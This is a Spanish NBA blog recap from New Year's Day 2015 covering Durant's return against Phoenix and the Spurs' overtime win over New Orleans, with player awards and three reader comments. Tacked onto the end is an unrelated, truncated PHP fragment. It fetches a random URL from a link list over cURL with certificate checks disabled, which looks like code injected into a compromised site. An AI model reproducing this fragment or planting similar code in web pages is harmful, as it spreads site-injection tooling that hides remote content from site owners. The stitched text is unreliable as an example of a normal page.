La crónica: Adiós 2014, hola KD

01 de January de 2015 por MagicJohnson32

Feliz año tengan ustedes, compañeros de este singular viaje a ninguna parte que es TJNBA. Con el sincero deseo de que iniciasen 2015 acompañados de la gente a la que más quieren y que no eligiesen Canal Sur para comer las uvas, pasamos a repasar lo que nos dejó la jornada de cierre de 2014, una madrugada con sus altibajos que, más allá de otra derrota de los Cavs y un triunfo agónico de los Spurs, quedará en nuestra memoria por el retorno de Kevin Durant en modo MVP.

A ello.

kd_suns

Phoenix Suns 134 – OKC Thunder 137 (OT)

Apenas unos segundos necesitó Durant para demostrar que el esguince de tobillo que le ha mantenido fuera de las canchas los últimos partidos estaba más que superado. El vigente MVP fue un martillo pilón toda la velada, y la eliminación de Westbrook por dos técnicas cerca del descanso no hizo más que situar a Durant de manera aún más clara como centro gravitatorio del juego de los Thunder. La espectacular actuación de KD encontró una respuesta colectiva por parte de los Suns, con Dragic, Bledsoe y los gemelos Morris haciendo todo lo posible para equilibrar la balanza. Lo lograron y no solo llevaron el partido a la prórroga, sino que pudieron llevarse la victoria si el intento de triple de Markieff hubiese entrado. La victoria acerca a los Thunder a 1,5 partidos de la octava plaza del Oeste que ocupan los Suns.

New Orleans Pelicans 93 – San Antonio Spurs 95 (OT)

La pelea por las últimas plazas de Playoffs del Oeste se habría abierto de par en par si no fuese por una de las acciones más afortunadas (o desgraciadas, desde el punto de vista de los Pelicans) que veremos este curso. Con los Pelicans dos arriba después de un mate de Anthony Davis a 0:07 para el final, Boris Diaw sacó de banda y su pase bombeado a Duncan lo palmeó Omer Asik. De alguna manera, por algún motivo que algunos llamarán “la suerte del campeón”, el balón acabó entrando para forzar la prórroga. El excelente partido de Ginóbili y la terrible lectura de Tyreke Evans hicieron el resto para dar a los Spurs un triunfo que les asienta en la séptima posición y espanta fantasmas ante el inevitable ascenso de los Thunder y la amenazadora presencia de Pelicans y Suns a tiro de piedra del cuadro texano.

Resto de la jornada

Toda la emoción de la jornada (que no fue poca) se concentró en los dos encuentros repasados en las líneas anteriores. Del resto hay que destacar una nueva derrota de los Cavs (96-80), previsible en esta ocasión dadas las bajas (LeBron, Love…) frente a unos buenos Bucks que están ya a un paso de alcanzarlos en los standings. En Houston, James Harden despidió el año con otra actuación que cimenta su candidatura al MVP en la clara victoria sobre los Hornets (83-102). Los Pacers ya piensan en los Playoffs tras ganar a Miami Heat (95-106) con un notable George Hill. Y cómodas victorias locales de los Clippers sobre los Knicks ( 78-99) y de los Celtics frente a los Kings (106-84), en este caso facilitada por el primer cruce de cables de DeMarcus Cousins esta temporada.

PREMIOS

MVP: Fueron compañeros y hoy comparten honores como mejores jugadores de la última jornada de 2014. James Harden acumuló 36 puntos (12/19 TC, 8/11 triples), 7 rebotes, 6 asistencias y 2 robos, por los 44 puntos (13/23 TC), 10 rebotes y 7 asistencias de Kevin Durant. Dos monstruos.

Rookie: Partiendo desde el banquillo, Marcus Smart firmó una buena actuación con 11 puntos, 6 rebotes, 2 asistencias y 2 robos.

Sorpresa: Ha esperado al último día del año pero Andrea Bargnani decidió honrarnos con su presencia y, hay que decirlo, su actuación pudo ser peor. 9 puntos, 4 rebotes y 2 asistencias en 20 minutos para el italiano.

Decepción: DeMarcus Cousins y Russell Westbrook estaban tal vez más pendientes de la cena de nochevieja que de sus partidos. Ambos fueron expulsados y nos privaron del espectáculo que tanto el uno como el otro garantizan.

Mayor esfuerzo en vano: Premio colectivo para los Suns y personalizado en Eric Bledose (29 puntos y 8 asistencias). También, como casi cada vez que pierden los Pelicans, para Anthony Davis (21 puntos, 12 rebotes y 4 robos).

Top 10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Futurman dice:
    #1

    La canasta la mete Duncan, no manos de mantequilla Asik xD Feliz año a todos.

      Citar

  2. Viva_Dirk dice:
    #2

    Vengo a comentar el esperpéntico final de partido que protagonizó Tyreke Evans ayer, que le dio la posibilidad de ganar el partido a los Spurs. Los últimos 5 o 6 ataques de los Pelicans pasaron por sus manos y el balón ya no se movió de ahí hasta que falló en todas y cada una de las acciones que intentó, con Anthony Davis metiendo canastas imposibles este hombre se dedicó a tirar el partido por la borda. Tampoco entiendo que hizo Monty Williams en esos tiempos muertos.

    Está teniendo una temporada aceptable, pero ayer Evans llevó a su equipo a la derrota.

      Citar

  3. luismi_vallecas dice:
    #3

    Lebron ahora mismo debe estar arrepintiéndose de irse de Miami porque la temporada y las sensaciones de los Cavs es para echarse a llorar…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>